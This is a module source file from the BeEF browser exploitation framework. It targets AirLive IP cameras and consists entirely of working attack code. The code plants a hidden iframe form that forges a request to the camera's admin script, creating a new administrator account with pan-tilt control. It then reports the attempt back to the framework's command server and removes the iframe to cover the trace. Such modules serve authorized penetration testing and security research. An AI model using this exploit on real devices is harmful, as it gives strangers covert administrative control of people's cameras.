beef/modules/exploits/camera/airlive_ip_camera_csrf/command.js

//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var base  = '<%= @base %>'; 
  var path  = 'cgi-bin/admin/usrgrp.cgi';
  var user  = '<%= @user %>';
  var pass  = '<%= @pass %>';

  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
    [{'type':'hidden', 'name':'user',     'value':user},
     {'type':'hidden', 'name':'pwd',      'value':pass},
     {'type':'hidden', 'name':'grp',      'value':'administrator'},
     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
     {'type':'hidden', 'name':'action',   'value':'add'},
     {'type':'hidden', 'name':'redirect', 'value':''}
    ]);

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
  }
  setTimeout("cleanup()", 15000);

});